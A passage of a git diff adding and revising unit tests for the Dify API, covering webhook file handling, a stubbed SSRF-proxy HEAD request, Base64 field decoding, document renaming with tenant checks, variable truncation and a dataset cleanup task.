-            variable_pool=variable_pool,
-            start_at=0,
-        ),
+        graph_init_params=graph_init_params,
+        graph_runtime_state=runtime_state,
     )
+    # Provide tenant_id for the conversion path
+    runtime_state.app_config = type("_AppCfg", (), {"tenant_id": "1"})()
+
+    # Compatibility alias for some nodes referencing `self.node_id`
+    node.node_id = node.id
+
     return node
 
@@ -246,20 +256,27 @@ def test_webhook_node_run_with_file_params():
                 "query_params": {},
                 "body": {},
                 "files": {
-                    "upload": file1,
-                    "document": file2,
+                    "upload": file1.to_dict(),
+                    "document": file2.to_dict(),
                 },
             }
         },
     )
 
     node = create_webhook_node(data, variable_pool)
-    result = node._run()
+    # Mock the file factory to avoid DB-dependent validation on upload_file_id
+    with patch("factories.file_factory.build_from_mapping") as mock_file_factory:
+
+        def _to_file(mapping, tenant_id, config=None, strict_type_validation=False):
+            return File.model_validate(mapping)
+
+        mock_file_factory.side_effect = _to_file
+        result = node._run()
 
     assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
-    assert result.outputs["upload"] == file1
-    assert result.outputs["document"] == file2
-    assert result.outputs["missing_file"] is None
+    assert isinstance(result.outputs["upload"], FileVariable)
+    assert isinstance(result.outputs["document"], FileVariable)
+    assert result.outputs["upload"].value.filename == "image.jpg"
 
 
 def test_webhook_node_run_mixed_parameters():
@@ -291,19 +308,27 @@ def test_webhook_node_run_mixed_parameters():
                 "headers": {"Authorization": "Bearer token"},
                 "query_params": {"version": "v1"},
                 "body": {"message": "Test message"},
-                "files": {"upload": file_obj},
+                "files": {"upload": file_obj.to_dict()},
             }
         },
    )
 
     node = create_webhook_node(data, variable_pool)
-    result = node._run()
+    # Mock the file factory to avoid DB-dependent validation on upload_file_id
+    with patch("factories.file_factory.build_from_mapping") as mock_file_factory:
+
+        def _to_file(mapping, tenant_id, config=None, strict_type_validation=False):
+            return File.model_validate(mapping)
+
+        mock_file_factory.side_effect = _to_file
+        result = node._run()
 
     assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
     assert result.outputs["Authorization"] == "Bearer token"
     assert result.outputs["version"] == "v1"
     assert result.outputs["message"] == "Test message"
-    assert result.outputs["upload"] == file_obj
+    assert isinstance(result.outputs["upload"], FileVariable)
+    assert result.outputs["upload"].value.filename == "test.jpg"
     assert "_webhook_raw" in result.outputs
diff --git a/api/tests/unit_tests/core/workflow/test_workflow_entry.py b/api/tests/unit_tests/core/workflow/test_workflow_entry.py
index 75de5c455f..68d6c109e8 100644
--- a/api/tests/unit_tests/core/workflow/test_workflow_entry.py
+++ b/api/tests/unit_tests/core/workflow/test_workflow_entry.py
@@ -1,3 +1,5 @@
+from types import SimpleNamespace
+
 import pytest
 
 from core.file.enums import FileType
@@ -12,6 +14,36 @@ from core.workflow.system_variable import SystemVariable
 from core.workflow.workflow_entry import WorkflowEntry
 
 
+@pytest.fixture(autouse=True)
+def _mock_ssrf_head(monkeypatch):
+    """Avoid any real network requests during tests.
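+
+    A response stub of the following shape is sufficient (a sketch; only
+    status_code and these three headers are consumed by the code under test):
+
+        SimpleNamespace(status_code=200, headers={
+            "Content-Type": "image/png",
+            "Content-Disposition": 'attachment; filename="a.png"',
+            "Content-Length": "12345",
+        })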
+
+    file_factory._get_remote_file_info() uses ssrf_proxy.head to inspect
+    remote files. We stub it to return a minimal response object with
+    headers so filename/mime/size can be derived deterministically.
+    """
+
+    def fake_head(url, *args, **kwargs):
+        # Choose a content type by file suffix for determinism
+        if url.endswith(".pdf"):
+            ctype = "application/pdf"
+        elif url.endswith(".jpg") or url.endswith(".jpeg"):
+            ctype = "image/jpeg"
+        elif url.endswith(".png"):
+            ctype = "image/png"
+        else:
+            ctype = "application/octet-stream"
+        filename = url.split("/")[-1] or "file.bin"
+        headers = {
+            "Content-Type": ctype,
+            "Content-Disposition": f'attachment; filename="{filename}"',
+            "Content-Length": "12345",
+        }
+        return SimpleNamespace(status_code=200, headers=headers)
+
+    monkeypatch.setattr("core.helper.ssrf_proxy.head", fake_head)
+
+
 class TestWorkflowEntry:
     """Test WorkflowEntry class methods."""
diff --git a/api/tests/unit_tests/libs/test_encryption.py b/api/tests/unit_tests/libs/test_encryption.py
new file mode 100644
index 0000000000..bf013c4bae
--- /dev/null
+++ b/api/tests/unit_tests/libs/test_encryption.py
@@ -0,0 +1,150 @@
+"""
+Unit tests for field encoding/decoding utilities.
+
+These tests verify Base64 encoding/decoding functionality and
+proper error handling and fallback behavior.
+"""
+
+import base64
+
+from libs.encryption import FieldEncryption
+
+
+class TestDecodeField:
+    """Test cases for field decoding functionality."""
+
+    def test_decode_valid_base64(self):
+        """Test decoding a valid Base64 encoded string."""
+        plaintext = "password123"
+        encoded = base64.b64encode(plaintext.encode("utf-8")).decode()
+
+        result = FieldEncryption.decrypt_field(encoded)
+        assert result == plaintext
+
+    def test_decode_non_base64_returns_none(self):
+        """Test that non-Base64 input returns None."""
+        non_base64 = "plain-password-!@#"
+        result = FieldEncryption.decrypt_field(non_base64)
+        # Should return None (decoding failed)
+        assert result is None
+
+    def test_decode_unicode_text(self):
+        """Test decoding Base64 encoded Unicode text."""
+        plaintext = "密码Test123"
+        encoded = base64.b64encode(plaintext.encode("utf-8")).decode()
+
+        result = FieldEncryption.decrypt_field(encoded)
+        assert result == plaintext
+
+    def test_decode_empty_string(self):
+        """Test that decoding an empty string returns an empty string."""
+        result = FieldEncryption.decrypt_field("")
+        # An empty string Base64-decodes to an empty string
+        assert result == ""
+
+    def test_decode_special_characters(self):
+        """Test decoding with special characters."""
+        plaintext = "P@ssw0rd!#$%^&*()"
+        encoded = base64.b64encode(plaintext.encode("utf-8")).decode()
+
+        result = FieldEncryption.decrypt_field(encoded)
+        assert result == plaintext
+
+
+class TestDecodePassword:
+    """Test cases for password decoding."""
+
+    def test_decode_password_base64(self):
+        """Test decoding a Base64 encoded password."""
+        password = "SecureP@ssw0rd!"
+        encoded = base64.b64encode(password.encode("utf-8")).decode()
+
+        result = FieldEncryption.decrypt_password(encoded)
+        assert result == password
+
+    def test_decode_password_invalid_returns_none(self):
+        """Test that invalid Base64 passwords return None."""
+        invalid = "PlainPassword!@#"
+        result = FieldEncryption.decrypt_password(invalid)
+        # Should return None (decoding failed)
+        assert result is None
+
+
+class TestDecodeVerificationCode:
+    """Test cases for verification code decoding."""
+
+    def test_decode_code_base64(self):
+        """Test decoding a Base64 encoded verification code."""
+        code = "789012"
+        encoded = base64.b64encode(code.encode("utf-8")).decode()
+
+        result = FieldEncryption.decrypt_verification_code(encoded)
+        assert result == code
+
+    def test_decode_code_invalid_returns_none(self):
+        """Test that invalid Base64 codes return None."""
+        invalid = "123456"  # Plain 6-digit code, not Base64
+        result = FieldEncryption.decrypt_verification_code(invalid)
+        # Should return None (decoding failed)
+        assert result is None
+
+
+class TestRoundTripEncodingDecoding:
+    """
+    Integration tests for the complete encoding-decoding cycle.
+    These tests simulate the full frontend-to-backend flow using Base64.
+    """
+
+    def test_roundtrip_password(self):
+        """Test encoding and decoding a password."""
+        original_password = "SecureP@ssw0rd!"
+
+        # Simulate frontend encoding (Base64)
+        encoded = base64.b64encode(original_password.encode("utf-8")).decode()
+
+        # Backend decoding
+        decoded = FieldEncryption.decrypt_password(encoded)
+
+        assert decoded == original_password
+
+    def test_roundtrip_verification_code(self):
+        """Test encoding and decoding a verification code."""
+        original_code = "123456"
+
+        # Simulate frontend encoding
+        encoded = base64.b64encode(original_code.encode("utf-8")).decode()
+
+        # Backend decoding
+        decoded = FieldEncryption.decrypt_verification_code(encoded)
+
+        assert decoded == original_code
+
+    def test_roundtrip_unicode_password(self):
+        """Test encoding and decoding a password with Unicode characters."""
+        original_password = "密码Test123!@#"
+
+        # Frontend encoding
+        encoded = base64.b64encode(original_password.encode("utf-8")).decode()
+
+        # Backend decoding
+        decoded = FieldEncryption.decrypt_password(encoded)
+
+        assert decoded == original_password
+
+    def test_roundtrip_long_password(self):
+        """Test encoding and decoding a long password."""
+        original_password = "ThisIsAVeryLongPasswordWithLotsOfCharacters123!@#$%^&*()"
+
+        encoded = base64.b64encode(original_password.encode("utf-8")).decode()
+        decoded = FieldEncryption.decrypt_password(encoded)
+
+        assert decoded == original_password
+
+    def test_roundtrip_with_whitespace(self):
+        """Test encoding and decoding with whitespace."""
+        original_password = "pass word with spaces"
+
+        encoded = base64.b64encode(original_password.encode("utf-8")).decode()
+        decoded = FieldEncryption.decrypt_field(encoded)
+
+        assert decoded == original_password
diff --git a/api/tests/unit_tests/oss/__mock/base.py b/api/tests/unit_tests/oss/__mock/base.py
index 974c462289..5bde461d94 100644
--- a/api/tests/unit_tests/oss/__mock/base.py
+++ b/api/tests/unit_tests/oss/__mock/base.py
@@ -14,7 +14,9 @@ def get_example_bucket() -> str:
 
 
 def get_opendal_bucket() -> str:
-    return "./dify"
+    import os
+
+    return os.environ.get("OPENDAL_FS_ROOT", "/tmp/dify-storage")
 
 
 def get_example_filename() -> str:
diff --git a/api/tests/unit_tests/oss/opendal/test_opendal.py b/api/tests/unit_tests/oss/opendal/test_opendal.py
index 2496aabbce..b83ad72b34 100644
--- a/api/tests/unit_tests/oss/opendal/test_opendal.py
+++ b/api/tests/unit_tests/oss/opendal/test_opendal.py
@@ -21,20 +21,16 @@ class TestOpenDAL:
     )
 
     @pytest.fixture(scope="class", autouse=True)
-    def teardown_class(self, request):
+    def teardown_class(self):
         """Clean up after all tests in the class."""
 
-        def cleanup():
-            folder = Path(get_opendal_bucket())
-            if folder.exists() and folder.is_dir():
-                for item in folder.iterdir():
-                    if item.is_file():
-                        item.unlink()
-                    elif item.is_dir():
-                        item.rmdir()
-                folder.rmdir()
+        yield
 
-        return cleanup()
+        folder = Path(get_opendal_bucket())
+        if folder.exists() and folder.is_dir():
+            import shutil
+
+            shutil.rmtree(folder, ignore_errors=True)
 
     def test_save_and_exists(self):
         """Test saving data and checking existence."""
diff --git a/api/tests/unit_tests/services/test_document_service_rename_document.py b/api/tests/unit_tests/services/test_document_service_rename_document.py
new file mode 100644
index 0000000000..94850ecb09
--- /dev/null
+++ b/api/tests/unit_tests/services/test_document_service_rename_document.py
@@ -0,0 +1,176 @@
+from types import SimpleNamespace
+from unittest.mock import Mock, create_autospec, patch
+
+import pytest
+
+from models import Account
+from services.dataset_service import DocumentService
+
+
+@pytest.fixture
+def mock_env():
+    """Patch dependencies used by DocumentService.rename_document.
+
+    Mocks:
+    - DatasetService.get_dataset
+    - DocumentService.get_document
+    - current_user (with current_tenant_id)
+    - db.session
+    """
+    with (
+        patch("services.dataset_service.DatasetService.get_dataset") as get_dataset,
+        patch("services.dataset_service.DocumentService.get_document") as get_document,
+        patch("services.dataset_service.current_user", create_autospec(Account, instance=True)) as current_user,
+        patch("extensions.ext_database.db.session") as db_session,
+    ):
+        current_user.current_tenant_id = "tenant-123"
+        yield {
+            "get_dataset": get_dataset,
+            "get_document": get_document,
+            "current_user": current_user,
+            "db_session": db_session,
+        }
+
+
+def make_dataset(dataset_id="dataset-123", tenant_id="tenant-123", built_in_field_enabled=False):
+    return SimpleNamespace(id=dataset_id, tenant_id=tenant_id, built_in_field_enabled=built_in_field_enabled)
+
+
+def make_document(
+    document_id="document-123",
+    dataset_id="dataset-123",
+    tenant_id="tenant-123",
+    name="Old Name",
+    data_source_info=None,
+    doc_metadata=None,
+):
+    doc = Mock()
+    doc.id = document_id
+    doc.dataset_id = dataset_id
+    doc.tenant_id = tenant_id
+    doc.name = name
+    doc.data_source_info = data_source_info or {}
+    # property-like usage in code relies on a dict
+    doc.data_source_info_dict = dict(doc.data_source_info)
+    doc.doc_metadata = dict(doc_metadata or {})
+    return doc
+
+
+def test_rename_document_success(mock_env):
+    dataset_id = "dataset-123"
+    document_id = "document-123"
+    new_name = "New Document Name"
+
+    dataset = make_dataset(dataset_id)
+    document = make_document(document_id=document_id, dataset_id=dataset_id)
+
+    mock_env["get_dataset"].return_value = dataset
+    mock_env["get_document"].return_value = document
+
+    result = DocumentService.rename_document(dataset_id, document_id, new_name)
+
+    assert result is document
+    assert document.name == new_name
+    mock_env["db_session"].add.assert_called_once_with(document)
+    mock_env["db_session"].commit.assert_called_once()
+
+
+def test_rename_document_with_built_in_fields(mock_env):
+    dataset_id = "dataset-123"
+    document_id = "document-123"
+    new_name = "Renamed"
+
+    dataset = make_dataset(dataset_id, built_in_field_enabled=True)
+    document = make_document(document_id=document_id, dataset_id=dataset_id, doc_metadata={"foo": "bar"})
+
+    mock_env["get_dataset"].return_value = dataset
+    mock_env["get_document"].return_value = document
+
+    DocumentService.rename_document(dataset_id, document_id, new_name)
+
+    assert document.name == new_name
+    # BuiltInField.document_name == "document_name" in service code
+    assert document.doc_metadata["document_name"] == new_name
+    assert document.doc_metadata["foo"] == "bar"
+
+
+def test_rename_document_updates_upload_file_when_present(mock_env):
+    dataset_id = "dataset-123"
+    document_id = "document-123"
+    new_name = "Renamed"
+    file_id = "file-123"
+
+    dataset = make_dataset(dataset_id)
+    document = make_document(
+        document_id=document_id,
+        dataset_id=dataset_id,
+        data_source_info={"upload_file_id": file_id},
+    )
+
+    mock_env["get_dataset"].return_value = dataset
+    mock_env["get_document"].return_value = document
+
+    # Intercept the UploadFile rename UPDATE chain
+    mock_query = Mock()
+    mock_query.where.return_value = mock_query
+    mock_env["db_session"].query.return_value = mock_query
+
+    DocumentService.rename_document(dataset_id, document_id, new_name)
+
+    assert document.name == new_name
+    mock_env["db_session"].query.assert_called()  # the UPDATE was executed
+
+
+def test_rename_document_does_not_update_upload_file_when_missing_id(mock_env):
+    """
+    When data_source_info_dict exists but does not contain "upload_file_id",
+    UploadFile should not be updated.
+    """
+    dataset_id = "dataset-123"
+    document_id = "document-123"
+    new_name = "Another Name"
+
+    dataset = make_dataset(dataset_id)
+    # Ensure data_source_info_dict is truthy but lacks the key
+    document = make_document(
+        document_id=document_id,
+        dataset_id=dataset_id,
+        data_source_info={"url": "https://example.com"},
+    )
+
+    mock_env["get_dataset"].return_value = dataset
+    mock_env["get_document"].return_value = document
+
+    DocumentService.rename_document(dataset_id, document_id, new_name)
+
+    assert document.name == new_name
+    # Should NOT attempt to update UploadFile
+    mock_env["db_session"].query.assert_not_called()
+
+
+def test_rename_document_dataset_not_found(mock_env):
+    mock_env["get_dataset"].return_value = None
+
+    with pytest.raises(ValueError, match="Dataset not found"):
+        DocumentService.rename_document("missing", "doc", "x")
+
+
+def test_rename_document_not_found(mock_env):
+    dataset = make_dataset("dataset-123")
+    mock_env["get_dataset"].return_value = dataset
+    mock_env["get_document"].return_value = None
+
+    with pytest.raises(ValueError, match="Document not found"):
+        DocumentService.rename_document(dataset.id, "missing", "x")
+
+
+def test_rename_document_permission_denied_when_tenant_mismatch(mock_env):
+    dataset = make_dataset("dataset-123")
+    # A different tenant than current_user.current_tenant_id
+    document = make_document(dataset_id=dataset.id, tenant_id="tenant-other")
+
+    mock_env["get_dataset"].return_value = dataset
+    mock_env["get_document"].return_value = document
+
+    with pytest.raises(ValueError, match="No permission"):
+        DocumentService.rename_document(dataset.id, document.id, "x")
diff --git a/api/tests/unit_tests/services/test_variable_truncator.py b/api/tests/unit_tests/services/test_variable_truncator.py
index cf6fb25c1c..ec819ae57a 100644
--- a/api/tests/unit_tests/services/test_variable_truncator.py
+++ b/api/tests/unit_tests/services/test_variable_truncator.py
@@ -518,6 +518,55 @@ class TestEdgeCases:
         assert isinstance(result.result, StringSegment)
+
+class TestTruncateJsonPrimitives:
+    """Test _truncate_json_primitives method with different data types."""
+
+    @pytest.fixture
+    def truncator(self):
+        return VariableTruncator()
+
+    def test_truncate_json_primitives_file_type(self, truncator, file):
+        """Test that File objects are handled correctly in _truncate_json_primitives."""
+        # Test File object is returned as-is without truncation
+        result = truncator._truncate_json_primitives(file, 1000)
+
+        assert result.value == file
+        assert result.truncated is False
+        # Size should be calculated correctly
+        expected_size = VariableTruncator.calculate_json_size(file)
+        assert result.value_size == expected_size
+
+    def test_truncate_json_primitives_file_type_small_budget(self, truncator, file):
+        """Test that File objects are returned as-is even with a small budget."""
+        # Even with a small size budget, File objects should not be truncated
+        result = truncator._truncate_json_primitives(file, 10)
+
+        assert result.value == file
+        assert result.truncated is False
+
+    def test_truncate_json_primitives_file_type_in_array(self, truncator, file):
+        """Test File objects in arrays are handled correctly."""
+        array_with_files = [file, file]
+        result = truncator._truncate_json_primitives(array_with_files, 1000)
+
+        assert isinstance(result.value, list)
+        assert len(result.value) == 2
+        assert result.value[0] == file
+        assert result.value[1] == file
+        assert result.truncated is False
+
+    def test_truncate_json_primitives_file_type_in_object(self, truncator, file):
+        """Test File objects in objects are handled correctly."""
+        obj_with_files = {"file1": file, "file2": file}
+        result = truncator._truncate_json_primitives(obj_with_files, 1000)
+
+        assert isinstance(result.value, dict)
+        assert len(result.value) == 2
+        assert result.value["file1"] == file
+        assert result.value["file2"] == file
+        assert result.truncated is False
+
+
 class TestIntegrationScenarios:
     """Test realistic integration scenarios."""
diff --git a/api/tests/unit_tests/services/test_webhook_service.py b/api/tests/unit_tests/services/test_webhook_service.py
index 6afe52d97b..d788657589 100644
--- a/api/tests/unit_tests/services/test_webhook_service.py
+++ b/api/tests/unit_tests/services/test_webhook_service.py
@@ -82,19 +82,19 @@ class TestWebhookServiceUnit:
             "/webhook",
             method="POST",
             headers={"Content-Type": "multipart/form-data"},
-            data={"message": "test", "upload": file_storage},
+            data={"message": "test", "file": file_storage},
         ):
             webhook_trigger = MagicMock()
             webhook_trigger.tenant_id = "test_tenant"
 
             with patch.object(WebhookService, "_process_file_uploads") as mock_process_files:
-                mock_process_files.return_value = {"upload": "mocked_file_obj"}
+                mock_process_files.return_value = {"file": "mocked_file_obj"}
 
                 webhook_data = WebhookService.extract_webhook_data(webhook_trigger)
 
                 assert webhook_data["method"] == "POST"
                 assert webhook_data["body"]["message"] == "test"
-                assert webhook_data["files"]["upload"] == "mocked_file_obj"
+                assert webhook_data["files"]["file"] == "mocked_file_obj"
                 mock_process_files.assert_called_once()
 
     def test_extract_webhook_data_raw_text(self):
@@ -110,6 +110,70 @@ class TestWebhookServiceUnit:
             assert webhook_data["method"] == "POST"
             assert webhook_data["body"]["raw"] == "raw text content"
 
+    def test_extract_octet_stream_body_uses_detected_mime(self):
+        """Octet-stream uploads should rely on the detected MIME type."""
+        app = Flask(__name__)
+        binary_content = b"plain text data"
+
+        with app.test_request_context(
+            "/webhook",
+            method="POST",
+            headers={"Content-Type": "application/octet-stream"},
+            data=binary_content,
+        ):
+            webhook_trigger = MagicMock()
+            mock_file = MagicMock()
+            mock_file.to_dict.return_value = {"file": "data"}
+
+            with (
+                patch.object(WebhookService, "_detect_binary_mimetype", return_value="text/plain") as mock_detect,
+                patch.object(WebhookService, "_create_file_from_binary") as mock_create,
+            ):
+                mock_create.return_value = mock_file
+                body, files = WebhookService._extract_octet_stream_body(webhook_trigger)
+
+                assert body["raw"] == {"file": "data"}
+                assert files == {}
+                mock_detect.assert_called_once_with(binary_content)
+                mock_create.assert_called_once()
+                args = mock_create.call_args[0]
+                assert args[0] == binary_content
+                assert args[1] == "text/plain"
+                assert args[2] is webhook_trigger
+
+    def test_detect_binary_mimetype_uses_magic(self, monkeypatch):
+        """The python-magic output should be used when available."""
+        fake_magic = MagicMock()
+        fake_magic.from_buffer.return_value = "image/png"
+        monkeypatch.setattr("services.trigger.webhook_service.magic", fake_magic)
+
+        result = WebhookService._detect_binary_mimetype(b"binary data")
+
+        assert result == "image/png"
+        fake_magic.from_buffer.assert_called_once()
+
+    def test_detect_binary_mimetype_fallback_without_magic(self, monkeypatch):
+        """The fallback MIME type should be used when python-magic is unavailable."""
+        monkeypatch.setattr("services.trigger.webhook_service.magic", None)
+
+        result = WebhookService._detect_binary_mimetype(b"binary data")
+
+        assert result == "application/octet-stream"
+
+    def test_detect_binary_mimetype_handles_magic_exception(self, monkeypatch):
+        """The fallback MIME type should be used when python-magic raises an exception."""
+        try:
+            import magic as real_magic
+        except ImportError:
+            pytest.skip("python-magic is not installed")
+
+        fake_magic = MagicMock()
+        fake_magic.from_buffer.side_effect = real_magic.MagicException("magic error")
+        monkeypatch.setattr("services.trigger.webhook_service.magic", fake_magic)
+
+        with patch("services.trigger.webhook_service.logger") as mock_logger:
+            result = WebhookService._detect_binary_mimetype(b"binary data")
+
+            assert result == "application/octet-stream"
+            mock_logger.debug.assert_called_once()
+
     def test_extract_webhook_data_invalid_json(self):
         """Test webhook data extraction with invalid JSON."""
         app = Flask(__name__)
diff --git a/api/tests/unit_tests/tasks/test_clean_dataset_task.py b/api/tests/unit_tests/tasks/test_clean_dataset_task.py
new file mode 100644
index 0000000000..bace66bec4
--- /dev/null
+++ b/api/tests/unit_tests/tasks/test_clean_dataset_task.py
@@ -0,0 +1,1232 @@
+"""
+Unit tests for clean_dataset_task.
+
+This module tests the dataset cleanup task functionality including:
+- Basic cleanup of documents and segments
+- Vector database cleanup with IndexProcessorFactory
+- Storage file deletion
+- Invalid doc_form handling with default fallback
+- Error handling and database session rollback
+- Pipeline and workflow deletion
+- Segment attachment cleanup
+"""
+
+import uuid
+from unittest.mock import MagicMock, patch
+
+import pytest
+
+from tasks.clean_dataset_task import clean_dataset_task
+
+# ============================================================================
+# Fixtures
+# ============================================================================
+
+
+@pytest.fixture
+def tenant_id():
+    """Generate a unique tenant ID for testing."""
+    return str(uuid.uuid4())
+
+
+@pytest.fixture
+def dataset_id():
+    """Generate a unique dataset ID for testing."""
+    return str(uuid.uuid4())
+
+
+@pytest.fixture
+def collection_binding_id():
+    """Generate a unique collection binding ID for testing."""
+    return str(uuid.uuid4())
+
+
+@pytest.fixture
+def pipeline_id():
+    """Generate a unique pipeline ID for testing."""
+    return str(uuid.uuid4())
+
+
+@pytest.fixture
+def mock_db_session():
+    """Mock database session with query capabilities."""
+    with patch("tasks.clean_dataset_task.db") as mock_db:
+        mock_session = MagicMock()
+        mock_db.session = mock_session
+
+        # Setup query chain
+        mock_query = MagicMock()
+        mock_session.query.return_value = mock_query
+        mock_query.where.return_value = mock_query
+        mock_query.delete.return_value = 0
+
+        # Setup scalars for select queries
+        mock_session.scalars.return_value.all.return_value = []
+
+        # Setup execute for JOIN queries
+        mock_session.execute.return_value.all.return_value = []
+
+        yield mock_db
+
+
+@pytest.fixture
+def mock_storage():
+    """Mock storage client."""
+    with patch("tasks.clean_dataset_task.storage") as mock_storage:
+        mock_storage.delete.return_value = None
+        yield mock_storage
+
+
+@pytest.fixture
+def mock_index_processor_factory():
+    """Mock IndexProcessorFactory."""
+    with patch("tasks.clean_dataset_task.IndexProcessorFactory") as mock_factory:
+        mock_processor = MagicMock()
+        mock_processor.clean.return_value = None
+        mock_factory_instance = MagicMock()
+        mock_factory_instance.init_index_processor.return_value = mock_processor
+        mock_factory.return_value = mock_factory_instance
+
+        yield {
+            "factory": mock_factory,
+            "factory_instance": mock_factory_instance,
+            "processor": mock_processor,
+        }
+
+
+@pytest.fixture
+def mock_get_image_upload_file_ids():
+    """Mock get_image_upload_file_ids function."""
+    with patch("tasks.clean_dataset_task.get_image_upload_file_ids") as mock_func:
+        mock_func.return_value = []
+        yield mock_func
+
+
+@pytest.fixture
+def mock_document():
+    """Create a mock Document object."""
+    doc = MagicMock()
+    doc.id = str(uuid.uuid4())
+    doc.tenant_id = str(uuid.uuid4())
+    doc.dataset_id = str(uuid.uuid4())
+    doc.data_source_type = "upload_file"
+    doc.data_source_info = '{"upload_file_id": "test-file-id"}'
+    doc.data_source_info_dict = {"upload_file_id": "test-file-id"}
+    return doc
+
+
+@pytest.fixture
+def mock_segment():
+    """Create a mock DocumentSegment object."""
+    segment = MagicMock()
+    segment.id = str(uuid.uuid4())
+    segment.content = "Test segment content"
+    return segment
+
+
+@pytest.fixture
+def mock_upload_file():
+    """Create a mock UploadFile object."""
+    upload_file = MagicMock()
+    upload_file.id = str(uuid.uuid4())
+    upload_file.key = f"test_files/{uuid.uuid4()}.txt"
+    return upload_file
+
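+
+# How the fixtures above line up with the task's assumed access pattern
+# (a sketch; statement shapes are inferred from the assertions below, not
+# copied from the task's source):
+#
+#     db.session.query(SomeModel).where(...).delete()    # -> mock_query.delete
+#     db.session.scalars(some_select).all()               # -> mock_session.scalars
+#     db.session.execute(some_join_select).all()          # -> mock_session.execute
+#     storage.delete(upload_file.key)                     # -> mock_storage.delete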
+
+# ============================================================================
+# Test Basic Cleanup
+# ============================================================================
+
+
+class TestBasicCleanup:
+    """Test cases for basic dataset cleanup functionality."""
+
+    def test_clean_dataset_task_empty_dataset(
+        self,
+        dataset_id,
+        tenant_id,
+        collection_binding_id,
+        mock_db_session,
+        mock_storage,
+        mock_index_processor_factory,
+        mock_get_image_upload_file_ids,
+    ):
+        """
+        Test cleanup of an empty dataset with no documents or segments.
+
+        Scenario:
+        - Dataset has no documents or segments
+        - Should still clean vector database and delete related records
+
+        Expected behavior:
+        - IndexProcessorFactory is called to clean vector database
+        - No storage deletions occur
+        - Related records (DatasetProcessRule, etc.) are deleted
+        - Session is committed and closed
+        """
+        # Arrange
+        mock_db_session.session.scalars.return_value.all.return_value = []
+
+        # Act
+        clean_dataset_task(
+            dataset_id=dataset_id,
+            tenant_id=tenant_id,
+            indexing_technique="high_quality",
+            index_struct='{"type": "paragraph"}',
+            collection_binding_id=collection_binding_id,
+            doc_form="paragraph_index",
+        )
+
+        # Assert
+        mock_index_processor_factory["factory"].assert_called_once_with("paragraph_index")
+        mock_index_processor_factory["processor"].clean.assert_called_once()
+        mock_storage.delete.assert_not_called()
+        mock_db_session.session.commit.assert_called_once()
+        mock_db_session.session.close.assert_called_once()
+
+    def test_clean_dataset_task_with_documents_and_segments(
+        self,
+        dataset_id,
+        tenant_id,
+        collection_binding_id,
+        mock_db_session,
+        mock_storage,
+        mock_index_processor_factory,
+        mock_get_image_upload_file_ids,
+        mock_document,
+        mock_segment,
+    ):
+        """
+        Test cleanup of a dataset with documents and segments.
+
+        Scenario:
+        - Dataset has one document and one segment
+        - No image files in segment content
+
+        Expected behavior:
+        - Documents and segments are deleted
+        - Vector database is cleaned
+        - Session is committed
+        """
+        # Arrange
+        mock_db_session.session.scalars.return_value.all.side_effect = [
+            [mock_document],  # documents
+            [mock_segment],  # segments
+        ]
+        mock_get_image_upload_file_ids.return_value = []
+
+        # Act
+        clean_dataset_task(
+            dataset_id=dataset_id,
+            tenant_id=tenant_id,
+            indexing_technique="high_quality",
+            index_struct='{"type": "paragraph"}',
+            collection_binding_id=collection_binding_id,
+            doc_form="paragraph_index",
+        )
+
+        # Assert
+        mock_db_session.session.delete.assert_any_call(mock_document)
+        mock_db_session.session.delete.assert_any_call(mock_segment)
+        mock_db_session.session.commit.assert_called_once()
+
+    def test_clean_dataset_task_deletes_related_records(
+        self,
+        dataset_id,
+        tenant_id,
+        collection_binding_id,
+        mock_db_session,
+        mock_storage,
+        mock_index_processor_factory,
+        mock_get_image_upload_file_ids,
+    ):
+        """
+        Test that all related records are deleted.
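+
+        The deletion pattern assumed here is one bulk delete per related
+        model, roughly (a sketch; the task's actual statements may differ):
+
+            db.session.query(DatasetProcessRule).where(
+                DatasetProcessRule.dataset_id == dataset_id
+            ).delete()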
+
+        Expected behavior:
+        - DatasetProcessRule records are deleted
+        - DatasetQuery records are deleted
+        - AppDatasetJoin records are deleted
+        - DatasetMetadata records are deleted
+        - DatasetMetadataBinding records are deleted
+        """
+        # Arrange
+        mock_query = mock_db_session.session.query.return_value
+        mock_query.where.return_value = mock_query
+        mock_query.delete.return_value = 1
+
+        # Act
+        clean_dataset_task(
+            dataset_id=dataset_id,
+            tenant_id=tenant_id,
+            indexing_technique="high_quality",
+            index_struct='{"type": "paragraph"}',
+            collection_binding_id=collection_binding_id,
+            doc_form="paragraph_index",
+        )
+
+        # Assert - verify query(...).where(...).delete() was called multiple times
+        # for different models (DatasetProcessRule, DatasetQuery, etc.)
+        assert mock_query.delete.call_count >= 5
+
+
+# ============================================================================
+# Test Doc Form Validation
+# ============================================================================
+
+
+class TestDocFormValidation:
+    """Test cases for doc_form validation and default fallback."""
+
+    @pytest.mark.parametrize(
+        "invalid_doc_form",
+        [
+            None,
+            "",
+            " ",
+            "\t",
+            "\n",
+            " \t\n ",
+        ],
+    )
+    def test_clean_dataset_task_invalid_doc_form_uses_default(
+        self,
+        invalid_doc_form,
+        dataset_id,
+        tenant_id,
+        collection_binding_id,
+        mock_db_session,
+        mock_storage,
+        mock_index_processor_factory,
+        mock_get_image_upload_file_ids,
+    ):
+        """
+        Test that invalid doc_form values use the default paragraph index type.
+
+        Scenario:
+        - doc_form is None, empty, or whitespace-only
+        - Should use default IndexStructureType.PARAGRAPH_INDEX
+
+        Expected behavior:
+        - Default index type is used for cleanup
+        - No errors are raised
+        - Cleanup proceeds normally
+        """
+        # Arrange - import to verify the default value
+        from core.rag.index_processor.constant.index_type import IndexStructureType
+
+        # Act
+        clean_dataset_task(
+            dataset_id=dataset_id,
+            tenant_id=tenant_id,
+            indexing_technique="high_quality",
+            index_struct='{"type": "paragraph"}',
+            collection_binding_id=collection_binding_id,
+            doc_form=invalid_doc_form,
+        )
+
+        # Assert - IndexProcessorFactory should be called with the default type
+        mock_index_processor_factory["factory"].assert_called_once_with(IndexStructureType.PARAGRAPH_INDEX)
+        mock_index_processor_factory["processor"].clean.assert_called_once()
+
+    def test_clean_dataset_task_valid_doc_form_used_directly(
+        self,
+        dataset_id,
+        tenant_id,
+        collection_binding_id,
+        mock_db_session,
+        mock_storage,
+        mock_index_processor_factory,
+        mock_get_image_upload_file_ids,
+    ):
+        """
+        Test that valid doc_form values are used directly.
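+
+        The validation assumed by the two tests in this class is a simple
+        truthiness-and-whitespace check, along the lines of (a sketch, not
+        the task's exact code):
+
+            doc_form = doc_form if doc_form and doc_form.strip() else IndexStructureType.PARAGRAPH_INDEX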
+
+        Expected behavior:
